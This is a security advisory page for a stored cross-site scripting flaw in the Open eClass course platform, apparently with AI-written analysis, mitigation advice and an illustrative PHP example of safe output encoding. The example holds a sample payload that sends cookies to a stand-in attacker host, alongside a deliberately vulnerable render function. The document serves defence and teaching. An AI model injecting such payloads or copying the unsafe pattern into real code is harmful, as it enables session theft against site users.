CVE-2026-24671: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in gunet openeclass
The Open eClass platform (formerly known as GUnet eClass) is a complete course management system. Prior to version 4.2, a Stored Cross-Site Scripting (XSS) vulnerability allows authenticated high-privileged users (teachers or administrators) to inject malicious JavaScript into multiple user-controllable input fields across the application, which is executed when other users access affected pages. This issue has been patched in version 4.2.
AI Analysis
Technical Summary
CVE-2026-24671 is a stored cross-site scripting (XSS) vulnerability in the Open eClass platform (formerly GUnet eClass), a course management system used widely in higher education. It affects all versions prior to 4.2 and is classed as CWE-79, improper neutralization of input during web page generation. Authenticated users with elevated privileges (teachers or administrators) can place JavaScript into several user-controllable input fields across the application; the values are stored and later rendered into pages without adequate sanitization or output encoding, so the script executes in the browser of any user who views the affected page, including students and staff. Because the payload runs in the platform's own origin, it acts with the victim's session: it can read or exfiltrate data the victim is allowed to see, issue requests on the victim's behalf, or alter what the page displays. Session cookies flagged HttpOnly are not directly readable by script, but the script can still send authenticated requests from the victim's browser, so HttpOnly limits rather than prevents the impact. Exploitation requires an attacker account with teacher or administrator rights and a victim who opens the affected page. The CVSS v3.1 base score is 6.1 (medium). No exploitation in the wild had been reported at the time of writing. The issue is patched in Open eClass 4.2; given the platform's role in educational institutions, it threatens the confidentiality and integrity of user data and the trustworthiness of the learning environment.
Potential Impact
For European organizations, particularly educational institutions running Open eClass, this vulnerability can lead to hijacked user sessions, theft of personal data, and manipulation of course content or user interactions. Compromise of student or staff accounts could expose personal data, disrupt teaching, and erode trust in the digital learning platform. Since only high-privileged authenticated users can inject the payload, the realistic threat actors are malicious insiders and attackers who have already taken over a teacher or administrator account, for example through phishing or credential reuse. A script executing in a user's browser can also serve as a springboard for further attacks, such as in-platform phishing or malware delivery. There is a regulatory dimension as well: a breach involving personal data of students or staff may trigger GDPR notification duties and lead to legal and financial consequences. The absence of known exploits reduces the immediate risk but does not eliminate it, especially where older versions remain in use. European educational organizations should therefore treat this vulnerability as a medium-level threat to confidentiality and integrity.
Mitigation Recommendations
To mitigate CVE-2026-24671, organizations should upgrade Open eClass to version 4.2 or later, where the vulnerability is patched. After upgrading, review content that teachers and administrators have already stored in free-text fields for markup such as script tags or on* event handlers, because a payload injected before the upgrade persists in the database and its effect after the fix depends on how the patched code renders it. Where an immediate upgrade is not feasible, reduce the pool of accounts that can exploit the flaw: limit teacher and administrator roles to those who need them, remove stale privileged accounts, and monitor privileged activity for unusual edits to course content. A web application firewall can flag obvious script injections, but it is a weak control here, since the attacker is an authenticated user writing into fields that legitimately accept rich content and encoding tricks routinely evade signature rules. A Content Security Policy that disallows inline script (no 'unsafe-inline' in script-src) blocks the typical stored payload in supporting browsers; many older PHP applications depend on inline script, so deploy the policy in report-only mode first and resolve the reported violations before enforcing it. Set session cookies with the HttpOnly and SameSite attributes to narrow what an executing script can do. Longer term, include output encoding checks in code review and security audits, brief administrators and teachers on the risk of pasting untrusted HTML into the platform, and monitor application logs for patterns of attempted script injection so that incidents are detected and handled promptly.
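As an added illustration, not code from Open eClass or from the advisory, the following PHP (the language Open eClass is written in) shows the general CWE-79 pattern described above beside its hardened form, and the kind of CSP header the recommendations mention. The field name, function names and the stored sample value are hypothetical and constructed for the example.

```php
<?php
// Added example (hypothetical, not Open eClass code): a stored-XSS sink,
// its hardened form, and a restrictive CSP header.
declare(strict_types=1);

// Constructed sample of what a privileged user might have saved in a
// free-text field such as a course description. The "<", "&" and quote
// characters must be treated as data, not markup, when it is rendered.
const SAMPLE_DESCRIPTION = 'Week 1 <script>fetch("https://attacker.example/c?"+document.cookie)</script>';

// Vulnerable pattern (CWE-79): the stored value is concatenated into HTML
// unchanged, so the browser parses the payload as a script element.
function renderDescriptionUnsafe(string $stored): string
{
    return '<div class="course-desc">' . $stored . '</div>';
}

// Hardened pattern: HTML-encode at the point of output.
// ENT_QUOTES covers both quote styles so the value is also safe inside a
// quoted attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string (which would silently drop content); the
// explicit charset matters because charset mismatches are a classic bypass.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderDescriptionSafe(string $stored): string
{
    return '<div class="course-desc">' . e($stored) . '</div>';
}

// Attribute context: the same encoder works only if the attribute is quoted.
// An unquoted attribute could still be broken out of with whitespace.
function renderTitleAttr(string $stored): string
{
    return '<a href="/course/view" title="' . e($stored) . '">Course</a>';
}

// Defence in depth for deployments that cannot upgrade yet. Without
// 'unsafe-inline' in script-src, inline <script> blocks and on*= handlers
// are not executed by CSP-aware browsers. Start in report-only mode, since
// legacy applications often rely on inline script that this would break.
function cspPolicy(): string
{
    return "default-src 'self'; script-src 'self'; object-src 'none'; "
         . "base-uri 'self'; frame-ancestors 'self'";
}

function sendCspHeader(bool $reportOnly = false): void
{
    $name = $reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
    header($name . ': ' . cspPolicy());
}

if (PHP_SAPI === 'cli') {
    echo 'unsafe: ', renderDescriptionUnsafe(SAMPLE_DESCRIPTION), PHP_EOL;
    echo 'safe:   ', renderDescriptionSafe(SAMPLE_DESCRIPTION), PHP_EOL;
    echo 'attr:   ', renderTitleAttr(SAMPLE_DESCRIPTION), PHP_EOL;
    // The hardened output must not contain a raw "<script" sequence.
    var_dump(stripos(renderDescriptionSafe(SAMPLE_DESCRIPTION), '<script') === false);
}
```

Encoding on output rather than on input is the durable fix: it protects every rendering path regardless of how the value entered the database, which also covers payloads stored before the patch. Where a field is meant to hold rich HTML from teachers, encoding is not an option and the value must instead be passed through an HTML sanitizer with an allow-list of tags and attributes; that choice is deployment-specific and not shown here.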
Affected Countries
Germany, France, Italy, Spain, Greece, Netherlands, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-01-23T20:40:23.387Z
- CVSS Version: 3.1
- State: PUBLISHED
- Threat ID: 6982fcd8f9fa50a62f7664a1
- Added to database: 2/4/2026, 8:01:28 AM
- Last enriched: 2/4/2026, 8:18:14 AM
- Last updated: 2/7/2026, 7:37:46 PM